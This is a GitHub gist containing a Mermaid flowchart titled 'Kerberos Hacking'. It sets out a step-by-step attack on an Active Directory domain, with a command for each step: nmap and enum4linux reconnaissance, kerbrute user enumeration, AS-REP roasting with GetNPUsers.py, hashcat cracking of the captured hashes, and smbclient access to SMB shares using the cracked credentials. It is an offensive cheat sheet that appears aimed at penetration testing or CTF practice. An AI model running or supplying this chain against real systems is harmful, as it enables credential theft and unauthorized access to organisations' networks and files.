Skip to content

Instantly share code, notes, and snippets.

@abraidotti
Last active February 26, 2022 15:35
Show Gist options
  • Save abraidotti/f97c356ed605477bd0ba06ce2190bcbc to your computer and use it in GitHub Desktop.
Save abraidotti/f97c356ed605477bd0ba06ce2190bcbc to your computer and use it in GitHub Desktop.
Kerberos Hacking
graph TD
    kerberos-hacking-v1
    1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
    A[is kerberos running? -- typically port 88] -->  B
    B[find Active Directory domain names] -->|enum4linux $IP| C
    C[enumerate AD users] --> |kerbrute userenum --dc $AD-DOMAIN -d $IP /path/to/wordlist.txt| D
    D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
    E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
    F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
    G[connect to SMB shares] --> |smbclient -U $AD-DOMAIN/$AD-USER //$IP/$DIR| H
    H[look for further data]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment